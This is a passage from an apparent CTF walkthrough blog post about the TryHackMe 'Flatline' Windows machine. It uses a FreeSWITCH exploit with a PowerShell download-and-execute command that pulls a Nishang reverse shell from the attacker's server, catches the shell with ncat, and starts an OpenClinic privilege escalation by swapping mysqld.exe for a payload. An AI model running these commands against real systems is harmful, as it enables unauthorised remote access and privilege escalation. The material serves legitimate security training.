               &lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Dir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;446&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;991&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;360&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;free&lt;/span&gt;&lt;span class="w"&gt;


&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Wow. We seem to have found both files. We can read &lt;code&gt;user.txt&lt;/code&gt;. &lt;/p&gt;

&lt;p&gt;But we can't read &lt;code&gt;root.txt&lt;/code&gt;. Probably a permissions issue. &lt;/p&gt;

&lt;p&gt;Let's get a powershell reverse shell to see what's really going on.&lt;/p&gt;

&lt;h3&gt;
  
  
  Powershell Reverse Shell
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Save this file &lt;a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1"&gt;https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Delete the second shell comment. As for the first one, uncomment and replace IP and PORT as per your choice.&lt;/li&gt;
&lt;li&gt;Start a Python web server in the folder where you saved the powershell script. This is what we will use to serve the script.&lt;/li&gt;
&lt;li&gt;Download and execute the script on remote machine using the FreeSWITCH exploit.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Running the exploit&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf/thm_easy_flatline]
└─&lt;span class="nv"&gt;$ &lt;/span&gt;python3 exploit.py 10.10.7.242 &lt;span class="s2"&gt;"powershell IEX (New-Object Net.WebClient).DownloadString('http://10.14.31.78/Invoke-PowerShellTcpOneLine.ps1')"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run the web server to serve the Powershell reverse shell&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 80
Serving HTTP on 0.0.0.0 port 80 &lt;span class="o"&gt;(&lt;/span&gt;http://0.0.0.0:80/&lt;span class="o"&gt;)&lt;/span&gt; ...
10.10.7.242 - - &lt;span class="o"&gt;[&lt;/span&gt;06/Nov/2022 06:20:12] &lt;span class="s2"&gt;"GET /Invoke-PowerShellTcpOneLine.ps1 HTTP/1.1"&lt;/span&gt; 200 -
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Reverse Shell listener&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="err"&gt;┌──&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kali&lt;/span&gt;&lt;span class="err"&gt;㉿&lt;/span&gt;&lt;span class="nx"&gt;kali&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;-&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;~&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;└─$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ncat&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-lnvp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;4444&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;7.93&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;//nmap.org/ncat&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Listening&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;:::&lt;/span&gt;&lt;span class="mi"&gt;4444&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Listening&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;0&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;4444&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;7&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;242&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Ncat&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;7&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;242&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;49899&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;C:\Program&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Files\FreeSWITCH&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;gci&lt;/span&gt;&lt;span class="w"&gt;


    &lt;/span&gt;&lt;span class="n"&gt;Directory&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;C:\Program&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Files\FreeSWITCH&lt;/span&gt;&lt;span class="w"&gt;


&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;LastWriteTime&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="n"&gt;Length&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="o"&gt;-------------&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:22&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;cert&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:22&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;conf&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;06/11/2022&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;10:33&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="w"&gt;                                                                    
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:18&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;fonts&lt;/span&gt;&lt;span class="w"&gt;                                                                 
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:18&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;grammar&lt;/span&gt;&lt;span class="w"&gt;    
&lt;/span&gt;&lt;span class="o"&gt;....&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;SNIP&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;....&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;C:\Users\Nekrotic\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;get-acl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="n"&gt;Directory&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;C:\Users\Nekrotic\Desktop&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Path&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="n"&gt;Owner&lt;/span&gt;&lt;span class="w"&gt;                    &lt;/span&gt;&lt;span class="n"&gt;Access&lt;/span&gt;&lt;span class="w"&gt;                                                                               
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="o"&gt;-----&lt;/span&gt;&lt;span class="w"&gt;                    &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt;                                                                               
&lt;/span&gt;&lt;span class="n"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WIN&lt;/span&gt;&lt;span class="nt"&gt;-EOM4PK0578N&lt;/span&gt;&lt;span class="n"&gt;\Nekrotic&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\SYSTEM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Allow&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;FullControl...&lt;/span&gt;&lt;span class="w"&gt;  

&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;C:\Users\Nekrotic\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;get-acl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;root.txt&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="n"&gt;Directory&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;C:\Users\Nekrotic\Desktop&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Path&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="n"&gt;Owner&lt;/span&gt;&lt;span class="w"&gt;               &lt;/span&gt;&lt;span class="n"&gt;Access&lt;/span&gt;&lt;span class="w"&gt;                                
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="o"&gt;-----&lt;/span&gt;&lt;span class="w"&gt;               &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt;                                
&lt;/span&gt;&lt;span class="n"&gt;root.txt&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;AUTHORITY\SYSTEM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;NT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;AUTHORITY\SYSTEM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Allow&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;FullControl&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we can see why we can't read &lt;code&gt;root.txt&lt;/code&gt;. We will need to escalate privileges to be able to read the file.&lt;/p&gt;

&lt;h1&gt;
  
  
  Privesc
&lt;/h1&gt;

&lt;p&gt;While taking a look around the system, I came across this in the Administrator's desktop&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\Administrator\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;gci&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="n"&gt;Directory:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\Administrator\Desktop&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;LastWriteTime&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;Length&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="o"&gt;-------------&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;08&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;18:24&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="nx"&gt;108048384&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;FreeSWITCH-1.10.1-Release-x64.msi&lt;/span&gt;&lt;span class="w"&gt;                                     
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;08&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;06:05&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="nx"&gt;413584335&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe&lt;/span&gt;&lt;span class="w"&gt; 

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I am guessing this &lt;strong&gt;OpenClinic&lt;/strong&gt; software is installed. Looking around the system further, we find its installation location at &lt;code&gt;C:\projects\openclinic&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;gci&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="n"&gt;Directory:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\projects\openclinic&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;LastWriteTime&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;Length&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="o"&gt;-------------&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                                                                  
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:29&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;jdk1.8&lt;/span&gt;&lt;span class="w"&gt;                                                                
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:19&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;mariadb&lt;/span&gt;&lt;span class="w"&gt;                                                               
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:30&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;tomcat8&lt;/span&gt;&lt;span class="w"&gt;                                                               
&lt;/span&gt;&lt;span class="n"&gt;d-----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="nx"&gt;09/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:29&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;Uninstall&lt;/span&gt;&lt;span class="w"&gt;                                                             
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;06&lt;/span&gt;&lt;span class="n"&gt;/04/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;23:14&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;250&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;configureCountry.bat&lt;/span&gt;&lt;span class="w"&gt;                                                  
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;01&lt;/span&gt;&lt;span class="n"&gt;/07/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;18:20&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;167&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;configureLanguage.bat&lt;/span&gt;&lt;span class="w"&gt;                                                 
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:18&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;334840&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;lua5.1.dll&lt;/span&gt;&lt;span class="w"&gt;                                                            
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;07&lt;/span&gt;&lt;span class="n"&gt;/06/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;16:58&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;93696&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;OpenClinic&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;GA&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;login.exe&lt;/span&gt;&lt;span class="w"&gt;                                               
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;08&lt;/span&gt;&lt;span class="n"&gt;/05/2020&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;12:17&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;27136&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;OpenClinicStartServices.exe&lt;/span&gt;&lt;span class="w"&gt;                                           
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;02&lt;/span&gt;&lt;span class="n"&gt;/05/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;00:45&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;316&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stopOpenClinicHttp.bat&lt;/span&gt;&lt;span class="w"&gt;                                                
&lt;/span&gt;&lt;span class="nt"&gt;-a&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;07:18&lt;/span&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;1389568&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;uninstall.exe&lt;/span&gt;&lt;span class="w"&gt;   

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's see what we can do with this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;┌──&lt;span class="o"&gt;(&lt;/span&gt;kali㉿kali&lt;span class="o"&gt;)&lt;/span&gt;-[~/Documents/ctf_tools]
└─&lt;span class="nv"&gt;$ &lt;/span&gt;searchsploit openclinic
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
 Exploit Title                                                                                                             |  Path
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
OpenClinic GA 5.194.18 - Local Privilege Escalation                                                                        | windows/local/50448.txt
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Details of this exploit here =&amp;gt; &lt;a href="https://www.exploit-db.com/exploits/50448"&gt;https://www.exploit-db.com/exploits/50448&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;According to the instructions we need to replace the &lt;code&gt;mysqld.exe&lt;/code&gt; present in the OpenClinic installation with a malicious payload generated by us.&lt;/p&gt;

&lt;p&gt;Let's see if we have the permissions to do that.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="w"&gt;
